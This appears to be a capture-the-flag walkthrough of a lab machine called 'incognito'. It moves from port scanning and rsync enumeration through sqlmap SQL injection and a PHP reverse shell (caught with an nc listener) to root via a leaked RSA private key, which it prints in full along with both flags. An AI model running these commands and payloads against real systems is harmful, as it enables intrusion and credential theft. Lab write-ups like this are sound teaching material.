Recon to foothold
Let’s make a variable so we can refer to the box by name thoughout
root@incognito:~# export TARGET=$TARGET
root@incognito:~# echo $TARGET
$TARGET
So as always let’s begin with a scan, first masscan to pick up as many ports as possible (TCP & UDP)
rob:Metamorphosis/ $ sudo masscan -p1-65535,U:1-65535 $TARGET --rate=1000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-20 20:07:37 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 139/tcp on $TARGET
Discovered open port 137/udp on $TARGET
Discovered open port 873/tcp on $TARGET
Discovered open port 22/tcp on $TARGET
Discovered open port 80/tcp on $TARGET
Discovered open port 445/tcp on $TARGET
And then nmap to identify the services on those ports, we can leave out the UDP:137 port as this is just the UDP complement to TCP:139
rob:Metamorphosis/ $ nmap -A -v -T4 -p22,80,139,445,873 $TARGET
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 21:13 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating Ping Scan at 21:13
Scanning $TARGET [2 ports]
Completed Ping Scan at 21:13, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:13
Completed Parallel DNS resolution of 1 host. at 21:13, 0.03s elapsed
Initiating Connect Scan at 21:13
Scanning $TARGET [5 ports]
Discovered open port 445/tcp on $TARGET
Discovered open port 22/tcp on $TARGET
Discovered open port 139/tcp on $TARGET
Discovered open port 80/tcp on $TARGET
Discovered open port 873/tcp on $TARGET
Completed Connect Scan at 21:13, 0.01s elapsed (5 total ports)
Initiating Service scan at 21:13
Scanning 5 services on $TARGET
Completed Service scan at 21:13, 11.42s elapsed (5 services on 1 host)
NSE: Script scanning $TARGET.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.74s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.05s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Nmap scan report for $TARGET
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f7:0f:0a:18:50:78:07:10:f2:32:d1:60:30:40:d4:be (RSA)
| 256 5c:00:37:df:b2:ba:4c:f2:3c:46:6e:a3:e9:44:90:37 (ECDSA)
|_ 256 fe:bf:53:f1:d0:5a:7c:30:db:ac:c8:3c:79:64:47:c8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
Service Info: Host: INCOGNITO; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| nbstat: NetBIOS name: INCOGNITO, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| INCOGNITO<00> Flags: <unique><active>
| INCOGNITO<03> Flags: <unique><active>
| INCOGNITO<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: incognito
| NetBIOS computer name: INCOGNITO\x00
| Domain name: \x00
| FQDN: incognito
|_ System time: 2021-07-20T20:13:50+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-20T20:13:50
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.97 seconds
Before enumerating the web site on port 80 let’s quickly check out the other services, starting with SMB, in case there are useful creds or clues to be found
rob:Metamorphosis/ $ smbclient -L $TARGET -U "" -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (incognito server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
No user shares there but perhaps we can find something on the hidden shares
rob:Metamorphosis/ $ smbclient -U "" -N //$TARGET/print$
tree connect failed: NT_STATUS_ACCESS_DENIED
rob:Metamorphosis/ $ smbclient -U "" -N //$TARGET/IPC$
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
No, no we cant!
On port 873 we find RSYNC, let’s try to enumerate it
rob:Metamorphosis/ $ nc -vn $TARGET 873
(UNKNOWN) [$TARGET] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
Conf All Confs
@RSYNCD: EXIT
Ok, we find a shared folder, Conf, let’s now see if we can enumerate the contents
rob:Metamorphosis/ $ nc -vn $TARGET 873
(UNKNOWN) [$TARGET] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
Conf
@RSYNCD: OK
It seems we can, there is no AUTHREQD response. Now we will list the contained files
rob:Metamorphosis/ $ rsync -av --list-only rsync://$TARGET/Conf
receiving incremental file list
drwxrwxrwx 4,096 2021/04/10 21:03:08 .
-rw-r--r-- 4,620 2021/04/09 21:01:22 access.conf
-rw-r--r-- 1,341 2021/04/09 20:56:12 bluezone.ini
-rw-r--r-- 2,969 2021/04/09 21:02:24 debconf.conf
-rw-r--r-- 332 2021/04/09 21:01:38 ldap.conf
-rw-r--r-- 94,404 2021/04/09 21:21:57 lvm.conf
-rw-r--r-- 9,005 2021/04/09 20:58:40 mysql.ini
-rw-r--r-- 70,207 2021/04/09 20:56:56 php.ini
-rw-r--r-- 320 2021/04/09 21:03:16 ports.conf
-rw-r--r-- 589 2021/04/09 21:01:07 resolv.conf
-rw-r--r-- 29 2021/04/09 21:02:56 screen-cleanup.conf
-rw-r--r-- 9,542 2021/04/09 21:00:59 smb.conf
-rw-rw-r-- 72 2021/04/10 21:03:06 webapp.ini
sent 20 bytes received 379 bytes 798.00 bytes/sec
total size is 193,430 speedup is 484.79
Excellent, it wasn’t lying, ALL the conf files indeed. Let’s grab them all, then we can go through them for interesting tidbits
rob:Metamorphosis/ $ rsync -av rsync://$TARGET:873/Conf ./rsync_files/
receiving incremental file list
created directory ./rsync_files
./
access.conf
bluezone.ini
debconf.conf
ldap.conf
lvm.conf
mysql.ini
php.ini
ports.conf
resolv.conf
screen-cleanup.conf
smb.conf
webapp.ini
sent 255 bytes received 194,360 bytes 129,743.33 bytes/sec
total size is 193,430 speedup is 0.99
Going through these we find
access.conf: Login access control, all commented outbluezone.ini: A possibly old version of a Terminal Emulator, changed name after an acquisition to Rocket Terminal Emulator in 2007, possibly useful info laterdebconf.conf: Config file fordebconf, mostly containing filesystem locations. From the manual we can read a descriptionDebconf provides a consistent interface for configuring packages, allowing you to choose from several user interface frontends. It supports preconfiguring packages before they are installed, which allows large installs and upgrades to ask you for all the necessary information up front, and then go do the work while you do something else
ldap.conf,lvm.conf,mysql.ini,php.ini,ports.conf,resolv.conf&screen-cleanup.confall contain default values and nothing of interestsmb.conf: Samba settings. Apart from letting us confirm thatguest ok =nofor theprint$share, there is nothing of interest herewebapp.ini: Now this one (the last one naturally) does have some useful information for us[Web_App] env = prod user = tom password = theCat [Details] Local = No
Excellent, we’ve found some creds, tom:theCat, let’s see if these are useful later on
Alright, time to enumerate the web server on port 80
Ok, we find the default Apache2 install page. A quick check shows us no sneaky comments or scripts, and we have no robots.txt file. Now, our nmap scan did show us a hostname for the server
Computer name: incognito
We can try adding this to our /etc/hosts file in case there is a virtual host on this web server that is hiding something useful from us. However incognito.thm (and a couple other variants) doesn’t get us anywhere either
Let’s try some directory busting with gobuster
rob:rsync_files/ $ gobuster dir --url http://$TARGET$ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x txt,php,conf,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://incognito.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,conf,zip,bak,txt
[+] Timeout: 10s
===============================================================
2021/07/20 21:59:57 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> http://incognito.thm/admin/]
/index.php (Status: 200) [Size: 10818]
/server-status (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 10818]
===============================================================
2021/07/20 22:06:54 Finished
===============================================================
Straight away we find a /admin directory, but receive a fake ‘403 Forbidden’. The server is actually returning a ‘200 OK’ but index.* obviously contains this message instead
Let’s try gobuster on that subdirectory, /admin, then and see if there is anything more to be found
rob:rsync_files/ $ gobuster dir --url http://incognito.thm/admin/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x txt,php,conf,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://incognito.thm/admin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php,conf,zip,bak
[+] Timeout: 10s
===============================================================
2021/07/20 22:10:44 Starting gobuster in directory enumeration mode
===============================================================
/config.php (Status: 200) [Size: 0]
/index.php (Status: 200) [Size: 132]
/index.php (Status: 200) [Size: 132]
===============================================================
2021/07/20 22:17:40 Finished
===============================================================
Nothing to be found here either
Taking a closer look at that fake 403 message we find something interesting, a comment in the HTML source code
<html> <head><h1>403 Forbidden</h1></head><!-- Make sure admin functionality can only be used in development environment. --></html>
Perhaps there is a development virtual host, something like dev.* or beta.*. Let’s use gobuster again in vhost mode to have a search
rob:Metamorphosis/ $ gobuster vhost --url http://incognito.thm -w /usr/share/seclists/Discovery/DNS/deepmagic.com-prefixes-top50000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://incognito.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/deepmagic.com-prefixes-top50000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/21 11:43:38 Starting gobuster in VHOST enumeration mode
===============================================================
Found: block7_dsl.incognito.thm (Status: 400) [Size: 422]
Found: mu_domain.incognito.thm (Status: 400) [Size: 422]
Found: block6_dsl.incognito.thm (Status: 400) [Size: 422]
Found: wm_nmeiers1.incognito.thm (Status: 400) [Size: 422]
===============================================================
2021/07/21 11:45:06 Finished
===============================================================
Ok, nothing jumping out for us there, and we try a few different wordlists to be sure
I wonder if that rsync share lets us write to it. We saw an env switch option in that webapp.ini file that we might be able to overwrite
[Web_App]
env = prod <---- **what if we change this to 'dev'**
user = tom
password = theCat
[Details]
Local = No
We edit the file to set the env parameter to dev and then use rsync to upload it
rob:Metamorphosis/ $ rsync -avH webapp.ini rsync://$TARGET:873/Conf
sending incremental file list
webapp.ini
sent 177 bytes received 41 bytes 436.00 bytes/sec
total size is 71 speedup is 0.33
Alright, that seemed to work ok, now does that give us a different result when we request /admin?
Excellent, yes it does! If we put the username tom into the query we get a response that confirms the password we saw earlier
It seems highly likely that this is an SQL query, and indeed we saw a mysql conf file earlier. Let’s have a look for an SQL Injection vulnerability using sqlmap
rob:Metamorphosis/ $ sqlmap -u http://$TARGET/admin/config.php --data "username=FUZZ" --level 5 --dbs
--snip--
available databases [5]:
[*] db
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
Excellent, we have found a vulnerability and can see the databases, let’s have a look in db for what tables might be there
rob:Metamorphosis/ $ sqlmap -u http://$TARGET/admin/config.php --data "username=FUZZ" --level 5 -D db --tables
--snip--
Database: db
[1 table]
+-------+
| users |
+-------+
Ok, just the one table, users. Let’s dump it out
[1 entry]
+----+-------+----------+
| id | uname | password |
+----+-------+----------+
| 1 | tom | thecat |
+----+-------+----------+
Ok, nothing in there apart from the user we already know!!
Let’s try using sqlmap again to see if we can get a shell
rob:Metamorphosis/ $ sqlmap -u http://$TARGET/admin/config.php --data "username=FUZZ" --level 5 -D db --os-shell
___
__H__
___ ___[(]_____ ___ ___ {1.5.7#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:09:43 /2021-07-21/
[13:09:43] [INFO] resuming back-end DBMS 'mysql'
[13:09:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=-7014" OR 8671=8671-- HOQx
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=FUZZ" AND (SELECT 9890 FROM (SELECT(SLEEP(5)))LxiX)-- ayAg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=FUZZ" UNION ALL SELECT NULL,CONCAT(0x7176627671,0x5556544a497752754a637a636558576b466b6d4c4972664c77576a7558435965516f744256705962,0x7178706b71),NULL-- -
---
[13:09:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[13:09:43] [INFO] going to use a web backdoor for command prompt
[13:09:43] [INFO] fingerprinting the back-end DBMS operating system
[13:09:43] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
[13:09:45] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
>
[13:09:46] [WARNING] unable to automatically parse any web server path
[13:09:46] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[13:09:46] [WARNING] unable to upload the file stager on '/var/www/'
[13:09:46] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[13:09:47] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:09:47] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[13:09:47] [INFO] trying to upload the file stager on '/var/www/admin/' via LIMIT 'LINES TERMINATED BY' method
[13:09:47] [WARNING] unable to upload the file stager on '/var/www/admin/'
[13:09:47] [INFO] trying to upload the file stager on '/var/www/admin/' via UNION method
[13:09:47] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[13:09:47] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[13:09:47] [WARNING] unable to upload the file stager on '/var/www/html/'
[13:09:47] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[13:09:47] [INFO] the remote file '/var/www/html/tmpultjc.php' is larger (707 B) than the local file '/tmp/sqlmapnkafb_pk26679/tmphmqslgp0' (705B)
[13:09:47] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://$TARGET:80/tmpultjc.php
[13:09:47] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://$TARGET:80/tmpbgxxa.php
[13:09:47] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
Ok, that worked nicely. We can also see the web address of the file stager (important, not the backdoor URL), let’s have a look at that
Well that looks useful, can we upload our go-to php reverse shell from pentestmonkey?
Looks like it. Let’s request the link now and see if we pop a shell
rob:rsync_files/ $ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.14.6.26] from (UNKNOWN) [$TARGET] 34302
Linux incognito 4.15.0-144-generic #148-Ubuntu SMP Sat May 8 02:33:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
12:45:09 up 1:25, 0 users, load average: 0.02, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Yes we do, we have our foothold!
Privesc to root
Let’s quickly stablize our shell
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@incognito:/$ ^Z
[1] + 27516 suspended nc -lnvp 1234
rob:rsync_files/ $ stty -a
speed 38400 baud; rows 49; columns 125; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S;
susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
rob:rsync_files/ $ stty raw -echo; fg
[1] + 27516 continued nc -lnvp 1234
www-data@incognito:/$ stty rows 49 columns 125
www-data@incognito:/$ export SHELL=bash
www-data@incognito:/$ export TERM=xterm-256color
www-data@incognito:/$ ^C
www-data@incognito:/$
Now we won’t be thrown out of our shell if we hit ^C and we have history, command completion etc. all functioning. NB because our attack box shell is zsh we have to use stty raw -echo; fg on a single line rather than separately as is often found in guides
A quick check shows us that the user flag is world-readable, so lets grab that first
www-data@incognito:/$ ls -la /home/tom/user.txt
-rw-rw-r-- 1 tom tom 33 Apr 10 19:48 /home/tom/user.txt
www-data@incognito:/$ cat /home/tom/
.bash_history .bash_logout .bashrc .cache/ .gnupg/ .local/ .profile user.txt
www-data@incognito:/$ cat /home/tom/user.txt
`REDACTED`
And we got #1: 4ce794a9d0019c1f684e07556821e0b0
Doing some enumeration on the box we run pspy64 to look for cron tasks and find something interesting. There there is a recurring curl command to an internally bound port. We saw this earlier but discounted it as being an IPv6 related service. NB don’t trust online ‘well-known ports’ lists, always worth checking oneself
--snip--
2021/07/21 13:54:01 CMD: UID=0 PID=27272 | curl http://127.0.0.1:1027/?admin=ScadfwerDSAd_343123ds123dqwe12
2021/07/21 13:54:01 CMD: UID=0 PID=27271 | /bin/sh /root/req.sh
2021/07/21 13:54:01 CMD: UID=0 PID=27270 | /bin/sh -c /root/req.sh
--snip--
Let’s try reproducing this curl command and see if we get back a response
www-data@incognito:/tmp$ curl http://127.0.0.1:1027/?admin=ScadfwerDSAd_343123ds123dqwe12
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyLHluXzbi43DIBFC47uRqkXTe72yPGxL+ImFwvOw8D/vd9mj
rt5SXjXSVtn6TguV2SFovrTlreUsv1CQwCSCixdMyQIWCgS/d+LfUyO3SC4FEr+k
wJ0ALG6wdjmHdRDW91JW0pG9Q+nTyv22K0a/yT91ZdlL/5cVjGKtYIob/504AdZZ
5NyCGq8t7ZUKhx0+TuKKcr2dDfL6rC5GBAnDkMxqo6tjkUH9nlFK7E9is0u1F3Zx
qrgn6PwOLDHeLgrQUok8NUwxDYxRM5zXT+I1Lr7/fGy/50ASvyDxZyjDuHbB7s14
K2HI32lVrx8u4X9Y2zgIU/mlIjuUtTyIAH4kswIDAQABAoIBAQCcPUImIPmZrwcU
09tLBx7je/CkCI3VVEngds9XcfdxUZTPrPMsk490IFpbmt6uG37Qxp2QuauEsUEg
v0uxCbtHJSB169XUftXAMzLAurFY09rHOcK84HzeGl3t6+N0U2PGrqdAzoyVblef
U9yZ3D46Idj3LS9pDumLnNZ0rZAWcaHW+rgjNqjsoBdQL7HGW+sacDAmZzU/Eti9
mH97NnrxkZuGXcnabXWcUj0HFHssCpF8KFPT3xxwtrqkUTJdMvUxxCD54HXiKM3u
jLXlX+HwHfLKHugYvLUuez7XFi6UP83Hiqmq48kB09sBa2iTV/iy6mHe7iyeELaa
9o7WHF2hAoGBAOPxNWc3vH18qu3WC6eMphPdYOaGBjbNBOgzJxzh/evxpSwRSG9V
63gNgKJ8zccQff/HH1n54VS+tuF7RCykRNb+Ne7K/uiDe1TpOKEMi7XtXOYHy5s1
tykL0OPdSs4hN1jMJjkSfPgdNPmxM3bbJMHDPjdQXAK6DnXmOCETaPAnAoGBAOFm
Fhqv8OREYFq+h1mDzMJn5WsNQQZnvvetJR7g3gfKcVblwMhlh504Tf3o00OGCKC1
L4iWMNb6uitKfTmGNta5X8ChWSVxXbb9fOWCOudNGt/fb70SK6fK9CSl66i/niIw
cIcu0tpS/T3MoqwMiGk87ivtW3bK20TsnY0tX3KVAoGAEeJdBEo1OctMRfjjVTQN
28Uk0zF0z1vqpKVOzk9U8uw0v25jtoiRPwwgKZ+NLa83k5f198NJULLd+ncHdFE3
LX8okCHROkEGrjTWQpyPYajL/yhhaz4drtTEgPxd4CpvA0KRRS0ULQttmqGyngK3
sZQ2D3T4oyYh+FIl2UKCm0UCgYEAyiHWqNAnY02+ayJ6FtiPg7fQkZQtQCVBqLNp
mqtl8e6mfZtEq3IBkAiySIXHD8Lfcd+KZR7rZZ8r3S7L5g5ql11edU08uMtVk4j3
vIpxcIRBGYsylYf6BluHXmY9U/OjSF3QTCq9hHTwDb+6EjibDGVL4bDWWU3KHaFk
GPsboZECgYAVK5KksKV2lJqjX7x1xPAuHoJEyYKiZJuw/uzAbwG2b4YxKTcTXhM6
ClH5GV7D5xijpfznQ/eZcTpr2f6mfZQ3roO+sah9v4H3LpzT8UydBU2FqILxck4v
QIaR6ed2y/NbuyJOIy7paSR+SlWT5G68FLaOmRzBqYdDOduhl061ww==
-----END RSA PRIVATE KEY-----
Well well, it seems we’ve found root’s private key, we should be able to SSH in as root now
rob:Metamorphosis/ $ vi id_rsa_root
rob:Metamorphosis/ $ chmod 600 id_rsa_root
rob:Metamorphosis/ $ ssh -i id_rsa_root root@$TARGET
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-144-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Jul 21 14:01:33 UTC 2021
System load: 0.0 Processes: 114
Usage of /: 53.3% of 8.79GB Users logged in: 0
Memory usage: 66% IP address for eth0: $TARGET
Swap usage: 0%
0 updates can be applied immediately.
Last login: Sat Apr 10 19:40:46 2021
root@incognito:~#
And we have root!
Let’s quickly grab the root flag then
root@incognito:~# cat root.txt
`REDACTED`
And we have #2: 7ffca2ec63534d165525bf37d91b4ff4